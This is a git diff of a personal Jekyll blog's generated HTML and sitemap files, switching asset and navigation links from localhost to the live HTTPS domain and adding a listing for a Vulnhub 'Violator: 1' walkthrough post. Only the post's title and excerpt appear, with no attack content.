 <title>Paul Walko</title>
 <!-- favicon -->
-<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-<link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+<link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
 <!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
-<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
+<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
 </head>
@ -78,16 +77,16 @@
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
-                    <li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
-                            <li><a href="http://localhost:4000/category">CATEGORY</a></li>
+                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
-                            <li><a href="http://localhost:4000/tag">TAG</a></li>
+                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -122,7 +121,7 @@
            <li  class="current"  data-show="writeup">
                <a href="javascript:void(0)">
                writeup
-                <span class="cateCnt">2</span>
+                <span class="cateCnt">3</span>
                </a>
            </li>
@ -152,6 +151,35 @@
            <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">08</p>
        <p class="month">Jul/2016</p>
        <p class="category">writeup</p>
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
        <h2 class="title"><a href="/writeup/violator_walkthrough">Violator: 1, Vulnhub Walkthrough</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> vulnhub</i></li>
            <li><i class="fa fa-tag"> hacking</i></li>
        </ul>
        <br>
        <hr class="clearfix">
        <p class="excerpt">
            Walkthrough for Violator: 1 VM on Vulnhub
        </p>
    </div>
    <button class="continue"><a href="/writeup/violator_walkthrough">FULL ARTICLE</a></button>
 </article>
            <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">19</p>
@ -216,8 +244,8 @@
 <div class="row" id="paginator">
-        <script type="text/javascript" src="http://localhost:4000/javascripts/pagination.js"></script>
+        <script type="text/javascript" src="https://paul.walko.org/javascripts/pagination.js"></script>
-        <script type="text/javascript" src="http://localhost:4000/javascripts/listAndPagi.js"></script>
+        <script type="text/javascript" src="https://paul.walko.org/javascripts/listAndPagi.js"></script>
@ -258,7 +286,7 @@
    </div>
 </footer>
-<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
+<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
 </body>
 </html>
--- a/_site/index.html
+++ b/_site/index.html
@ -5,12 +5,12 @@
 <html>
 <head>
    <meta charset="utf-8">
-<!--<script type="text/javascript">
+<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
-->
+
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@ -28,36 +28,35 @@
 <title>Paul Walko</title>
 <!-- favicon -->
-<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-<link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+<link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
 <!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
-<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
+<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
 </head>
@ -78,16 +77,16 @@
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
-                    <li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
-                            <li><a href="http://localhost:4000/category">CATEGORY</a></li>
+                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
-                            <li><a href="http://localhost:4000/tag">TAG</a></li>
+                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -120,6 +119,32 @@
        <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">08</p>
        <p class="month">Jul/2016</p>
        <p class="category">writeup</p>
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
        <h2 class="title"><a href="/writeup/violator_walkthrough">Violator: 1, Vulnhub Walkthrough</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> vulnhub</i></li>
            <li><i class="fa fa-tag"> hacking</i></li>
        </ul>
        <br>
        <hr class="clearfix">
        <p class="excerpt">
            Walkthrough for Violator: 1 VM on Vulnhub
        </p>
    </div>
    <button class="continue"><a href="/writeup/violator_walkthrough">FULL ARTICLE</a></button>
 </article>
        <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">19</p>
@ -179,8 +204,8 @@
 <div class="row" id="paginator">
-        <script type="text/javascript" src="http://localhost:4000/javascripts/pagination.js"></script>
+        <script type="text/javascript" src="https://paul.walko.org/javascripts/pagination.js"></script>
-        <script type="text/javascript" src="http://localhost:4000/javascripts/listAndPagi.js"></script>
+        <script type="text/javascript" src="https://paul.walko.org/javascripts/listAndPagi.js"></script>
@ -216,7 +241,7 @@
    </div>
 </footer>
-<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
+<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
 </body>
 </html>
--- a/_site/resume/index.html
+++ b/_site/resume/index.html
@ -5,30 +5,30 @@
 <html>
 <head>
    <title></title>
-    <link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/markdownreader_bare.css">
+    <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader_bare.css">
-    <link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/pygments_monokai.css">
+    <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
-    <link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/code_block.css">
+    <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
    <!-- favicon -->
-    <link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+    <link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-    <link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+    <link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-    <link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+    <link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-    <link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+    <link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-    <link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+    <link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-    <link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+    <link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-    <link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+    <link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-    <link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+    <link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-    <link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+    <link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-    <link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+    <link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-    <link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+    <link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-    <link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+    <link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-    <link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+    <link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-    <link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+    <link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
-    <meta http-equiv="refresh" content="0;url=http://localhost:4000/Walko_Paul-Resume.pdf">
+    <meta http-equiv="refresh" content="0;url=https://paul.walko.org/Walko_Paul-Resume.pdf">
 </head>
 <body>
  <script language="javascript">
-      window.location.href = "http://localhost:4000/Walko_Paul-Resume.pdf"
+      window.location.href = "https://paul.walko.org/Walko_Paul-Resume.pdf"
  </script>
 </body>
 </html>
--- a/_site/sitemap.txt
+++ b/_site/sitemap.txt
@ -1,5 +1,6 @@
-http://paul.walko.org//writeup/stapler_walkthough
+https://paul.walko.org//writeup/violator_walkthrough
-http://paul.walko.org//writeup/nebula_exploit_exercises
+https://paul.walko.org//writeup/stapler_walkthough
 https://paul.walko.org//writeup/nebula_exploit_exercises
--- a/_site/sitemap.xml
+++ b/_site/sitemap.xml
@ -5,14 +5,20 @@
        http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
    <url>
-        <loc>http://paul.walko.org//writeup/stapler_walkthough</loc>
+        <loc>https://paul.walko.org//writeup/violator_walkthrough</loc>
-        <lastmod>2016-06-19T18:13:08-04:00</lastmod>
+        <lastmod>2016-07-10T03:18:13-04:00</lastmod>
        <changefreq>weekly</changefreq>
    </url>
    <url>
-        <loc>http://paul.walko.org//writeup/nebula_exploit_exercises</loc>
+        <loc>https://paul.walko.org//writeup/stapler_walkthough</loc>
-        <lastmod>2016-06-19T18:13:08-04:00</lastmod>
+        <lastmod>2016-07-10T03:18:13-04:00</lastmod>
        <changefreq>weekly</changefreq>
    </url>
    <url>
        <loc>https://paul.walko.org//writeup/nebula_exploit_exercises</loc>
        <lastmod>2016-07-10T03:18:13-04:00</lastmod>
        <changefreq>weekly</changefreq>
    </url>
--- a/_site/tag/index.html
+++ b/_site/tag/index.html
@ -5,12 +5,12 @@
 <html>
 <head>
    <meta charset="utf-8">
-<!--<script type="text/javascript">
+<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
-->
+
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@ -28,36 +28,35 @@
 <title>Paul Walko</title>
 <!-- favicon -->
-<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-<link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+<link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
 <!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
-<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
+<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
 </head>
@ -78,16 +77,16 @@
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
-                    <li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
-                            <li><a href="http://localhost:4000/category">CATEGORY</a></li>
+                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
-                            <li><a href="http://localhost:4000/tag">TAG</a></li>
+                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -141,7 +140,7 @@
                <a href="javascript:void(0)">
                <i class="fa fa-tag"></i>
                 hacking
-                <span class="tagCnt">2</span>
+                <span class="tagCnt">3</span>
                </a>
            </li>
@ -150,7 +149,7 @@
                <a href="javascript:void(0)">
                <i class="fa fa-tag"></i>
                 vulnhub
-                <span class="tagCnt">1</span>
+                <span class="tagCnt">2</span>
                </a>
            </li>
@ -215,8 +214,8 @@
 <div class="row" id="paginator">
-        <script type="text/javascript" src="http://localhost:4000/javascripts/pagination.js"></script>
+        <script type="text/javascript" src="https://paul.walko.org/javascripts/pagination.js"></script>
-        <script type="text/javascript" src="http://localhost:4000/javascripts/listAndPagi.js"></script>
+        <script type="text/javascript" src="https://paul.walko.org/javascripts/listAndPagi.js"></script>
@ -312,6 +311,35 @@
            <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">08</p>
        <p class="month">Jul/2016</p>
        <p class="category">writeup</p>
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
        <h2 class="title"><a href="/writeup/violator_walkthrough">Violator: 1, Vulnhub Walkthrough</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> vulnhub</i></li>
            <li><i class="fa fa-tag"> hacking</i></li>
        </ul>
        <br>
        <hr class="clearfix">
        <p class="excerpt">
            Walkthrough for Violator: 1 VM on Vulnhub
        </p>
    </div>
    <button class="continue"><a href="/writeup/violator_walkthrough">FULL ARTICLE</a></button>
 </article>
            <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">19</p>
@ -405,6 +433,35 @@
            <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">08</p>
        <p class="month">Jul/2016</p>
        <p class="category">writeup</p>
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
        <h2 class="title"><a href="/writeup/violator_walkthrough">Violator: 1, Vulnhub Walkthrough</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> vulnhub</i></li>
            <li><i class="fa fa-tag"> hacking</i></li>
        </ul>
        <br>
        <hr class="clearfix">
        <p class="excerpt">
            Walkthrough for Violator: 1 VM on Vulnhub
        </p>
    </div>
    <button class="continue"><a href="/writeup/violator_walkthrough">FULL ARTICLE</a></button>
 </article>
            <article class="row">
    <div class="date col-lg-2 col-md-2 col-sm-2">
        <p class="day">19</p>
@ -476,7 +533,7 @@
    </div>
 </footer>
-<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
+<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
 </body>
 </html>
--- a/_site/writeup/nebula_exploit_exercises.html
+++ b/_site/writeup/nebula_exploit_exercises.html
@ -5,12 +5,12 @@
 <html>
 <head>
    <meta charset="utf-8">
-<!--<script type="text/javascript">
+<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
-->
+
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@ -28,41 +28,40 @@
 <title>Protostar Exploit Exercises Solutions 0-4</title>
 <!-- favicon -->
-<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-<link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+<link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
